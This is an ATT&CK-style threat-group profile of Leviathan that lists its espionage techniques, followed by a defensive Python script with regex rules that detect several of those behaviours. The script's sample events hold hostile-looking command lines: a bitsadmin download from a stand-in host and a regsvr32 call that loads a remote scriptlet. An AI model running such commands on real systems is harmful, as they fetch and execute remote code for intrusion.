Group: Leviathan, TEMP.Periscope

Leviathan, TEMP.Periscope
ID G0065
Aliases Leviathan, TEMP.Periscope
Contributors Valerii Marchuk, Cybersecurity Help s.r.o.

Leviathan is a cyber espionage group that has been active since at least 2013. The group generally targets defense and government organizations, but has also targeted a range of industries including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities in the United States, Western Europe, and along the South China Sea.[1][2]

Alias Descriptions

  • Leviathan - [1]
  • TEMP.Periscope - [2]

Techniques Used

  • Spearphishing Attachment - Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.[1]
  • Spearphishing Link - Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.[1]
  • Exploitation for Client Execution - Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[1][2]
  • Scripting - Leviathan has used multiple types of scripting for execution, including JavaScript, JavaScript Scriptlets in XML, and VBScript.[1]
  • PowerShell - Leviathan has used PowerShell for execution.[1][2]
  • Regsvr32 - Leviathan has used regsvr32 for execution.[1]
  • Valid Accounts - Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.[1]
  • Binary Padding - Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.[1]
  • Shortcut Modification - Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[1][2]
  • Remote File Copy - Leviathan has downloaded additional scripts and files from adversary-controlled servers.[1] Leviathan has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[2]
  • User Execution - Leviathan has sent spearphishing emails with links and attachments in an attempt to get a user to click.[1]
  • Command-Line Interface - Leviathan uses a backdoor known as BADFLICK that is capable of generating a reverse shell.[2]
  • Code Signing - Leviathan has used stolen code signing certificates to sign malware.[2]
  • BITS Jobs - Leviathan has used bitsadmin.exe to download additional tools.[2]
  • Data Staged - Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.[2]
  • Web Service - Leviathan has received C2 instructions from user profiles created on legitimate websites such as GitHub and TechNet.[2]
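A small triage script, added here as an example and not part of the ATT&CK page or any vendor's tooling, that runs regex detection rules for five of the behaviours listed above (bitsadmin downloads, regsvr32 loading a remote scriptlet, script-host execution, writes to the two named staging directories, and .lnk files dropped in a Startup folder) over constructed process and file events. The event schema, the rule patterns and the sample events are assumptions made for illustration.

```python
import re

# Detection heuristics keyed to the Leviathan behaviours listed above.
# Each entry: (technique label, event type, regex over the relevant field).
RULES = [
    ("BITS Jobs", "process",
     re.compile(r"bitsadmin(\.exe)?\b.*\s/(transfer|addfile|download)\b", re.I)),
    ("Regsvr32 scriptlet", "process",
     re.compile(r"regsvr32(\.exe)?\b.*\s/i:https?://", re.I)),
    ("Scripting", "process",
     re.compile(r"\b[wc]script(\.exe)?\b.*\.(js|vbs|jse|wsf)\b", re.I)),
    ("Data Staged", "file",
     re.compile(r"^C:\\(Windows\\Debug|Perflogs)\\", re.I)),
    ("Shortcut Modification", "file",
     re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)),
]

def match_event(event):
    """Return the technique labels whose rule fires on one event dict.
    Process events carry 'cmdline'; file-create events carry 'path'."""
    field = event.get("cmdline") if event["type"] == "process" else event.get("path")
    return [label for label, etype, rx in RULES
            if etype == event["type"] and field and rx.search(field)]

def scan(events):
    """Map each technique label to the indexes of the events that triggered it."""
    hits = {}
    for idx, ev in enumerate(events):
        for label in match_event(ev):
            hits.setdefault(label, []).append(idx)
    return hits

# Constructed sample telemetry (assumed schema); not real Leviathan artefacts.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r"bitsadmin /transfer upd /download /priority normal http://example.invalid/t.bin C:\Perflogs\t.bin"},
    {"type": "process", "cmdline": r"regsvr32 /i:http://example.invalid/p.sct scrobj.dll"},
    {"type": "process", "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\loader.js"},
    {"type": "file", "path": r"C:\Windows\Debug\out.dat"},
    {"type": "file", "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"},
    {"type": "process", "cmdline": r"notepad.exe C:\Users\u\notes.txt"},
    {"type": "file", "path": r"C:\Users\u\Documents\report.docx"},
]

if __name__ == "__main__":
    for label, idxs in scan(SAMPLE_EVENTS).items():
        print(f"{label}: events {idxs}")
```

The two benign events at the end exercise the no-match path; in practice these rules would be tuned against the environment's baseline before alerting on them.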